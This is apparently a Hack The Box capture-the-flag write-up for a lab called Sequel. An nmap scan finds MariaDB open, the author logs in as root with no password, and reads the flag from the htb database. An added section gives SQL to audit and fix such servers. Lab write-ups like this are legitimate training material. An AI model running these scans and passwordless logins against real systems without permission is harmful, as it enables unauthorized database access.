Sequel

Resolution summary

  • MariaDB was set up with no authentication: login as root with no password

Improved skills

  • Using an Nmap script (mysql-info) to quickly identify a weakness

Used tools

  • nmap
  • mysql cli

Information Gathering

Nmap Scan

# Nmap 7.93 scan initiated Wed Mar 15 09:44:32 2023 as: nmap -sC -oA nmap/nmap 10.129.204.145
Nmap scan report for 10.129.204.145
Host is up (0.052s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 86
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, ODBCClient, LongColumnFlag, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: {v_WwrW<fkfAPP|DyZ3/
|_  Auth Plugin Name: mysql_native_password

# Nmap done at Wed Mar 15 09:45:17 2023 -- 1 IP address (1 host up) scanned in 45.07 seconds

Enumeration

Port 3306 - MariaDB / MySQL

MariaDB was set up with no password and using the native password plugin (mysql_native_password). More info here: https://mariadb.com/kb/en/authentication-plugin-mysql_native_password/
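As an added defender-side example (not part of the original writeup), the following SQL audits a MariaDB 10.3 server for the same weakness and shows the fix. It assumes mysql.user still carries both the legacy Password column and authentication_string (true for 10.3), that the exposed account is 'root'@'%' (an assumption; the writeup only shows that root logged in remotely), and that it is run as a privileged account.

```sql
-- Added audit/remediation example, not from the original writeup.
-- Assumes MariaDB 10.3 (mysql.user has Password and authentication_string).

-- 1. Accounts that can authenticate without any password.
--    unix_socket is excluded: its empty password is expected, because the
--    OS socket peer credentials do the authentication instead.
SELECT User, Host, plugin
FROM mysql.user
WHERE Password = ''
  AND authentication_string = ''
  AND plugin <> 'unix_socket';

-- 2. Accounts reachable from anywhere, and root accounts not pinned to localhost.
SELECT User, Host
FROM mysql.user
WHERE Host IN ('%', '')
   OR (User = 'root' AND Host NOT IN ('localhost', '127.0.0.1', '::1'));

-- 3. Is the server listening on all interfaces? (empty or 0.0.0.0 means yes)
SHOW GLOBAL VARIABLES LIKE 'bind_address';

-- Remediation, option A: give the exposed account a real password.
-- 'root'@'%' is an assumed host pattern; substitute the rows found in step 2.
ALTER USER 'root'@'%' IDENTIFIED BY 'REPLACE_WITH_A_STRONG_PASSWORD';

-- Remediation, option B (preferred): remove remote root entirely and keep
-- the local, socket-authenticated root that the Debian package provides.
DROP USER IF EXISTS 'root'@'%';

-- Finally, in the [mysqld] section of the server config (not SQL):
--   bind-address = 127.0.0.1
-- so that port 3306 is no longer reachable from other hosts.
```

After the change, re-run the nmap scan from the writeup: the 3306 port should no longer appear open from the network, and a password-less login attempt with the mysql cli should be rejected.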


Exploitation

No auth

Enumeration showed the native password plugin with no password set, so login was simple:

No auth to login

Browsing the database allowed us to find the flag easily in the htb database.

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.050 sec)

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4b**********15da8              |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)

MariaDB [htb]>


Lateral Movement to user

Not required for the flag.


Privilege Escalation

Not required for the flag.


Trophy & Loot

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  5 | flag                  | 7b4b**********15da8              |
+----+-----------------------+----------------------------------+